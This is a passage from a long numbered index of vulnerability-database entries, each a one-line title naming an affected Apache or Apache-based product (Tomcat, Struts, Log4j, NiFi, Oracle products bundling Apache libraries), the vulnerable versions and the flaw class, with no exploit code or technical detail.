12325| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
12326| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
12327| [112885] Apache Allura up to 1.8.0 File information disclosure
12328| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
12329| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
12330| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
12331| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
12332| [112625] Apache POI up to 3.16 Loop denial of service
12333| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
12334| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
12335| [112339] Apache NiFi 1.5.0 Header privilege escalation
12336| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
12337| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
12338| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
12339| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
12340| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
12341| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
12342| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
12343| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
12344| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
12345| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
12346| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
12347| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
12348| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
12349| [112114] Oracle 9.1 Apache Log4j privilege escalation
12350| [112113] Oracle 9.1 Apache Log4j privilege escalation
12351| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
12352| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
12353| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
12354| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
12355| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
12356| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
12357| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
12358| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
12359| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
12360| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
12361| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
12362| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
12363| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
12364| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
12365| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
12366| [110701] Apache Fineract Query Parameter sql injection
12367| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
12368| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
12369| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
12370| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
12371| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
12372| [110106] Apache CXF Fediz Spring cross site request forgery
12373| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
12374| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
12375| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
12376| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
12377| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
12378| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
12379| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
12380| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
12381| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
12382| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
12383| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
12384| [108938] Apple macOS up to 10.13.1 apache denial of service
12385| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
12386| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
12387| [108935] Apple macOS up to 10.13.1 apache denial of service
12388| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
12389| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
12390| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
12391| [108931] Apple macOS up to 10.13.1 apache denial of service
12392| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
12393| [108929] Apple macOS up to 10.13.1 apache denial of service
12394| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
12395| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
12396| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
12397| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
12398| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
12399| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
12400| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
12401| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
12402| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
12403| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
12404| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
12405| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
12406| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
12407| [108782] Apache Xerces2 XML Service denial of service
12408| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
12409| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
12410| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
12411| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
12412| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
12413| [108629] Apache OFBiz up to 10.04.01 privilege escalation
12414| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
12415| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
12416| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
12417| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
12418| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
12419| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
12420| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
12421| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
12422| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
12423| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
12424| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
12425| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
12426| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
12427| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
12428| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
12429| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
12430| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
12431| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12432| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
12433| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
12434| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
12435| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
12436| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
12437| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
12438| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
12439| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
12440| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
12441| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
12442| [107639] Apache NiFi 1.4.0 XML External Entity
12443| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
12444| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
12445| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
12446| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
12447| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12448| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
12449| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
12450| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
12451| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
12452| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
12453| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
12454| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12455| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12456| [107197] Apache Xerces Jelly Parser XML File XML External Entity
12457| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
12458| [107084] Apache Struts up to 2.3.19 cross site scripting
12459| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
12460| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
12461| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
12462| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
12463| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
12464| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
12465| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
12466| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
12467| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
12468| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
12469| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
12470| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
12471| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12472| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12473| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
12474| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
12475| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
12476| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
12477| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
12478| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
12479| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
12480| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
12481| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
12482| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
12483| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
12484| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
12485| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
12486| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
12487| [105878] Apache Struts up to 2.3.24.0 privilege escalation
12488| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
12489| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
12490| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
12491| [105643] Apache Pony Mail up to 0.8b weak authentication
12492| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
12493| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
12494| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
12495| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
12496| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
12497| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
12498| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
12499| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
12500| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
12501| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
12502| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
12503| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
12504| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
12505| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
12506| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
12507| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
12508| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
12509| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
12510| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
12511| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
12512| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
12513| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
12514| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
12515| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
12516| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
12517| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
12518| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
12519| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
12520| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
12521| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
12522| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
12523| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
12524| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
12525| [103690] Apache OpenMeetings 1.0.0 sql injection
12526| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
12527| [103688] Apache OpenMeetings 1.0.0 weak encryption
12528| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
12529| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
12530| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
12531| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
12532| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
12533| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
12534| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
12535| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
12536| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
12537| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
12538| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
12539| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
12540| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
12541| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
12542| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
12543| [103352] Apache Solr Node weak authentication
12544| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
12545| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
12546| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
12547| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
12548| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
12549| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
12550| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
12551| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
12552| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
12553| [102536] Apache Ranger up to 0.6 Stored cross site scripting
12554| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
12555| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
12556| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
12557| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
12558| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
12559| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
12560| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
12561| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
12562| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
12563| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
12564| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
12565| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
12566| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
12567| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
12568| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
12569| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
12570| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
12571| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
12572| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
12573| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
12574| [99937] Apache Batik up to 1.8 privilege escalation
12575| [99936] Apache FOP up to 2.1 privilege escalation
12576| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
12577| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
12578| [99930] Apache Traffic Server up to 6.2.0 denial of service
12579| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
12580| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
12581| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
12582| [117569] Apache Hadoop up to 2.7.3 privilege escalation
12583| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
12584| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
12585| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
12586| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
12587| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
12588| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
12589| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
12590| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
12591| [99014] Apache Camel Jackson/JacksonXML privilege escalation
12592| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12593| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
12594| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12595| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
12596| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
12597| [98605] Apple macOS up to 10.12.3 Apache denial of service
12598| [98604] Apple macOS up to 10.12.3 Apache denial of service
12599| [98603] Apple macOS up to 10.12.3 Apache denial of service
12600| [98602] Apple macOS up to 10.12.3 Apache denial of service
12601| [98601] Apple macOS up to 10.12.3 Apache denial of service
12602| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
12603| [98405] Apache Hadoop up to 0.23.10 privilege escalation
12604| [98199] Apache Camel Validation XML External Entity
12605| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
12606| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
12607| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
12608| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
12609| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
12610| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
12611| [97081] Apache Tomcat HTTPS Request denial of service
12612| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
12613| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
12614| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
12615| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
12616| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
12617| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
12618| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
12619| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
12620| [95311] Apache Storm UI Daemon privilege escalation
12621| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
12622| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
12623| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
12624| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
12625| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
12626| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
12627| [94540] Apache Tika 1.9 tika-server File information disclosure
12628| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
12629| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
12630| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
12631| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
12632| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
12633| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
12634| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12635| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12636| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
12637| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
12638| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
12639| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
12640| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
12641| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
12642| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12643| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12644| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
12645| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
12646| [93532] Apache Commons Collections Library Java privilege escalation
12647| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
12648| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
12649| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
12650| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
12651| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
12652| [93098] Apache Commons FileUpload privilege escalation
12653| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
12654| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
12655| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
12656| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
12657| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
12658| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
12659| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
12660| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
12661| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
12662| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
12663| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
12664| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
12665| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
12666| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
12667| [92549] Apache Tomcat on Red Hat privilege escalation
12668| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
12669| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
12670| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
12671| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
